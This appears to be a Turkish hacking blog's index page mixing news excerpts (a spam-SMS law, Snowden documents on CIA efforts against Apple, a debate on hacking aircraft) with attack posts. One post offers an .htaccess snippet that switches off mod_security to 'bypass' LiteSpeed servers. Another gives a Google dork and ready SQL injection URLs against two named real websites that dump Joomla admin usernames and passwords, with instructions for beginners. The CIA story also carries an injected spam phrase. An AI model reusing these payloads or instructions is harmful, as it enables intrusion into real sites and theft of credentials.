-
19 Mayıs 2015 Salı
no image

Spam SMS/Reklamlar Tarih Oluyor
GENEL GÜNDEM
0
Neredeyse her gün telefonlarımıza gelen izinsiz reklam mesajları  1 Mayıs’ta gerçekleşecek elektronik ticaret yürürlüğüne göre tamamen yasaklanıyor. Reklam mesajlarının yanı sıra izinsiz arama ve e-posta göndermenin cezası 50 bin lira olacağı duyuruldu. Ayrıca Bilgi Teknolojileri ve İletişim Kurumu‘nun (BTK) taslak aşamasında olan düzenlemesine göre, istenmeyen mesajların dağıtımı sağlayan GSM operatörlerine de yaptırım uygulanacak.
Tüketici Sorunları Derneği (TÜSODER) Genel Başkanı Aydın Ağaoğlu, açıklamasında “Kanunla reklam mesajları ve e-postaları vatandaşın tercihine bırakılıyor” dedi ve şunları da ekledi:
Reklam mesajı göndermek isteyen firmalar tüketicinin onayını almak için onlara hiçbir mali külfet(ücret) yüklemeden, bu mesajları reddedebilecekleri şekilde bildirimde bulunup izinlerini almak zorundalar. Tüketici onay vermediği takdirde yani sessiz kaldığında bu durum reklam mesajlarının gelmesine izin verildiği şeklinde algılanmayacak. En geç 3 iş günü zarfında söz konusu mesaj trafiği durdurulacak.
Aydın Ağaoğlu, yasaya uymayan şirketlere kademeli olarak 50 bin liraya varan para cezası uygulanacağına dikkat çekerek sözlerini şöyle sürdürdü:
Bunu gören pek çok finans kurumu ve markaların sahipleri tüketicilere ‘izin ver’ mesajları göndererek tanıtım bildirimlerinin gönderilmesine, tüketicinin onay vermesi halinde çekilişle kendilerine akıllı telefonlardan, televizyonlara kadar hediye vadetmektedirler.
Tüketicilerimizin bu vaatlere aldanıp onay vermemelidir. Ülkemizde çekilişle hediye dağıtmak Milli Piyango idaresinden izin gerektirmektedir. Firmalar reklam ajanslarına ve çeşitli duyuru ajanslarına yüksek meblağlar ödeyerek atacakları duyuruları toplu mesajlarla gönderdikleri için bütçelerinde avantaj sağlamaktaydılar.

Taciz boyutuna varan bu ilan ve reklam bombardımanına uğrayan kişilerin elektronik posta adresleri, cep telefonlarını hatta ev adreslerini hangi yollardan ele geçirdikleri bir muammaydı. Bu istemeyen mesajlar tüketicilerin zaman zaman dolandırılmalarına vesile oluyordu.
DEVAMINI OKU..
no image

CIA’den Apple’a Sızma Girişimi
SİBER SALDIRILAR
2
Meğer CIAApple ürünlerinin şifreleme yöntemlerini çözmeye çalışıyormuş… Amerika’nın Ulusal Güvenlik Teşkilatı (NSA)‘nın eski analisti Edward Snowden belgeleri sızdırdı, bu belgeler CIA’in iPhoneve iPad cihazlarına sızmak için uzun zamandır uğraştığını ortaya çıkarttı.
Gazeteci Glenn GreenwaldSnowden‘ın NSA’den kaçırdığı belgeleri sızdırmasına yardım etti, gazeteci Greenwald’ın sitesi “The Intercept“de yayınlanan habere göre CIA tam 2006’dan bu yana Apple’ın iPhone ve iPad cihazlarında kullanılan şifreleme tekniklerini çözmek için uğraşıyor. Belgeler CIA’in Apple’ın sistemlerini kırmak için iOS uygulamarının yazıldığı Xcode platformuna sızmaya çalıştığını gösteriyor.
Snowden‘ın sızdırdığı belgeler CIA’ın senede bir kere düzenlediği çok gizli “Jamborees” konferansında katılımcıların Apple sistemlerine sızmak için saldırı stratejileri geliştirdiğini de gösteriyor.

Belgelerin 2006 tarihli olması dikkatleri çekiyor, belgelere göre Steve Jobs ilk IPhone’u tanıtmadan 1 yıl önce CIA bu sızma ve Amateur Porn Videos operasyonuna başlamıştı!


Gazeteci Greenwald “The Intercept”de yayınladığı haberde Amerikan istihbarat servislerinin Apple’a sızıp sızamadığı sonucunu açıklamadı!
DEVAMINI OKU..
no image

Uçakları Hacklemek Mümkün mü?
ANALİZ & MAKALELER
0
Merhaba değerli okurlar.
Bilişim ve ağ uzmanları tarafından son zamanların en çok tartışılan konularından biri olan uçakların hacklenmesi konusuna değineceğim bu yazıda…

Gerçekten Uçaklar Hackelenebilir mi?

Düşünelim bir uçağın sistemlerine sızıp uçağın tüm kontrol mekanizmasının bir hackerın eline geçtiğini. Dehşet ve korku verici olurdu bu herhalde. Uçağın pilotun kontrolünden çıkıp bilgisayar başında herhangi birinin uçağı kontrol edebileceğini düşünmek bile insana korku veriyor. Hatta bunu uçaktaki bir kişinin düşündüğünü düşünür isek tüyler ürpertici bir durum. Günümüz teknolojisinde artık illegal yollarla teknolojik araçların olduğu birçok sistem ele geçirilebilir duruma geldi. Biz biliyoruz ki internetin bulunduğu veya internetin bağlı olduğu bütün sistemler tehlike altında. Uçaklar da buna dahil. Çünkü artık uçaklarda wifi ağları kuruluyor, yolculara ücretsiz veya ücretli internet erişimi verilmeye başlanıyor. Dünyada yavaş yavaş artan özellikle Amerika’da çok yaygın olan bu gökyüzünde internet erişimi Türkiye ‘de ise 2014’ün Haziran ayında faaliyete geçirilmişti. THY’nin geniş gövde olarak nitelendirdiği Boeing 777-300ER tipinde uçaklarında bulunan ve WifiFly olarak isimlendirilen internet erişimi şu an yolcular tarafından memnuniyetle kullanılıyor. Fakat karada olduğu gibi havada da internet masum değil.
ucaklari-hacklemek2
Geçtiğimiz yıl ABD’de düzenlenen Black Hat Konferasında Satcom Terminals (Uydu Terminalleri) konulu bir sunum yapan güvenlik uzmanı Ruben Santamarta küresel uydu tabanlı iletişim ağına erişim sağlayan yer istasyonlarının yeterli güvenlik seviyesine sahip olmadığını ifade etmişti. Santamarta hazırladığı raporda uçaklarda uydu bağlantıları ile ilgili iletişim sağlayan donanımları test ettiklerini ve çoğunda güvenlik açıkları bulduklarını ifade etmişti. Bu işlemleri laboratuar ortamlarında denediklerini ve başarı elde ettiklerini ifade eden güvenlik uzmanı bunların bir simülasyondan öteye gitmesinin çok zor göründüğünü ifade etmişti. Fakat uçaklardaki Wi-Fi ve eğlence sistemlerinin daha korunaklı olması için uçak şirketlerinin her türlü korumayı sağlamaları gerektiğini belirtmişti. Santamarta bu uydu haberleşme sistemlerinin sadece uçaklarda değil gemilerde, gaz boru hatlarında da kullanıldığına dikkat çekerek buralarda görevli olan kişileride uyarmıştı.
Santamarta bu iddaalarında ne kadar doğru bilemiyoruz ama galiba üst düzey görevlileri etkilemiş görünüyor. Çünkü 2015’in Nisan ayında ABD Federal Havacılık Dairesi (FAA) tarafından hazırlanan rapor oldukça kafa karıştırdı ve ardından birçok tartışmaya yol açacak gibi görünüyor. Raporda uçaklarda bulunan kablosuz eğlence sistemlerinden, altyapısında internet bulunan bütün kokpit iletişimlere ve Wi-Fi ağlarına kadar IP ağlarının saldırıya açık olduğu belirtildi. Raporda geçen önemli yerleri listeleyecek olursak şu konuların altını çizebiliriz:
FAA diyor ki; hackerlar hava yolu sistemlerine iki şekilde sızabilirler. Birinci yöntem uçaklar da kullanılan Wi-Fi ağları. Uçaklarda bulunan güvenlik duvarı veya yazılım zafiyetleri sayesinde Wi-Fi ağına sızabilecek olan hacker uçakta birtakım kontrol mekanizmasını ele geçirebilir. Biraz uçuk bir fikir gibi gelsede neden olmasın dedirtiyor insana. Hele ki bu tehtit yolcuların kullandıkları tablet, bilgisayar veya akıllı bir telefon aracılığıyla daha da artıyor.
FAA’nın dikkat çektiği ikinci yöntem ise IP ağları. IP ağları sayesinde yolcuların cihazlarına kötü amaçlı yazılım yükleyebilecek olan hackerlar bu yolla uçağın sistemlerini hedef alabilirler deniliyor.
ABD Federal Havacılık Dairesi raporu üzerine tartışmalar sürerken Emekli Eski Pilot ve Adli Tıp Uzmanı Dr. Phil Postra bu raporun saçmalık olduğunu öne sürdü ve uçakların Wi-Fi yoluyla siber saldırıya uğramasının mümkün olmadığını söyledi. Postranın açıklamalarını inceledeğimizde ise uçuş kontrol ve kordinasyonunu sağlayan havacılığa bağlı ağların internet sağlayan cihazlara bağlı olmadığını belirterek uçaklarda internetin; Ethernet ve IP üzerinden yapıldığını yani birbirlerine veri göndererek bu işlemi yapan cihazlarla sağlandığını söyledi.
Phil Postra devam ettiği açıklamasında herhangi bir yolcunun cihazıylada bu tip bir saldırının mümkün olmayacağını, bu tip cihazların yönlendirici olamayacağını, bağlı olduğu sisteme veri gönderip alamayacağını iddaa etti. Hackerın elindeki tablet veya bilgisayarın verilerin aktığı kabloyu okuyamacağı ve analiz edemeyeceği için bir siber saldırının bu yollada mümkün olmadığını söyleyen emekli pilot bu raporun sorumsuzca ve işinde uzman olmayan kişilerce yazıldığını söyledi.

Göründüğü gibi uçaklara bir siber saldırı olabilir mi? Olursa nasıl bir etki yapar? Tüm bu sorular şu an bir çıkmaz da gibi görünsede bu tür tartışmalar halen sürecek gibi görünüyor. Günümüze kadar elimizde olan bilgilere göre uçaklara karşı bir siber saldırı girişimi olmadığını biliyoruz. Ama gelişen teknoloji ve yeni donanımlar karşısında sistemlerde açık ve zafiyetler her geçen gün artıyor. Güvenlik önlemleri alınmadıkça zamanın ne getireceğini tahmin etmek pek de zor olmuyor. Umarız uçaklarda da en kısa zamanda bu konularda gerekli çalışmalar başlatılır
DEVAMINI OKU..
no image

Selamun Aleyküm Arkadaşlar Vereceğim Kod Litespeed Serverlerde 5.2.17 Sürümünü Bypasslıyo Bu Kodları Nereye Yapıştırcaz Derseniz İse Ana Dizine .htaccess Açıcaksınız Onun İçince Yapıştırcaksınız Yada Varsa Dizin Açmadan İçine Yapıştırın Sonra O Server Bypass Olur 

Not: Bazı Serverler İnat Çıkabilir Uğraştırır Ama Çoğu 5.2.17 Sürümlü Serverleri Bypass Ediyo.


Htaccess Bypass litespeed php 5.2.17 

PHP Kod:
<Files *.php>
ForceType application/x-httpd-php4
</Files>
ahm tas: <ifModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
</IfModule> 

DEVAMINI OKU..
no image

joomla com_football Components Sql Injection vulnerability 
Selamun Aleyküm Bu Exploit'de Fazla Güncel Sayılmasada Günceldir Pek Bilinmeyen Bir Exp Futbol Sayfalarında Keşfedilmiştir Aslında Sql Açığı Diyebiliriz Ama Joomla Sürümlerinde Çıktığı İçin Exploite Dönüştürmüşler Uzun Lafın Kısası

joomla com_football Components Sql Injection vulnerability :

Exploiti Bulan Arkadaşın Adı : IeDb

Bu Exp'in Dorku :
PHP Kod:
index.php?option=com_football 

Exploit :
PHP Kod:
http://www.Site.com/index.php?option=com_football&task=viewteam&teamID 


Ve Benzeri Gibi Şey Görürseniz Orda Joomla com_football Components Sql Injection Vardır

Örnek Site :
PHP Kod:
http://www.cvhspreps.com/index.php?option=com_football&task=viewteam&tea%20%20mID=-1+union+select+null,null,3,4,5,6,concat%20%28username,0x3a,password%20%20%29,8+f​rom+jos_users+where+usertype=0x53757065722041646d696e697374726174%20%206f72-- 


PHP Kod:
http://www.sv-gruenbach.at/index.php?option=com_football&task=viewteam&teamID=-1+UNION+SELECT+1,2,group_concat%28username,0x3a,password%29,4,5+from+jos_users-- 

Hani Normal Sql Bulup Manuel Giriyoruz Ya Dorku Googleye Yazıp Yukarıda Verdiğim 
PHP Kod:
http://www.Site.com/index.php?option=com_football&task=viewteam&teamID 

Gibi Siteler Bulursanız Direk Site.com/ Kadar Silin Ve Örnek Siteler Attığım Sitelerin Devamını Yapıştırın Hiç Uğraşmadan Sql Yapın Username Password'uda Kafanıza Göre Yaparsınız Bu Kadar Arkadaşlar Kullanımı Çok Basit Kolay Gelsin Gülümseme

DEVAMINI OKU..
Kaydol: Yorumlar ( Atom )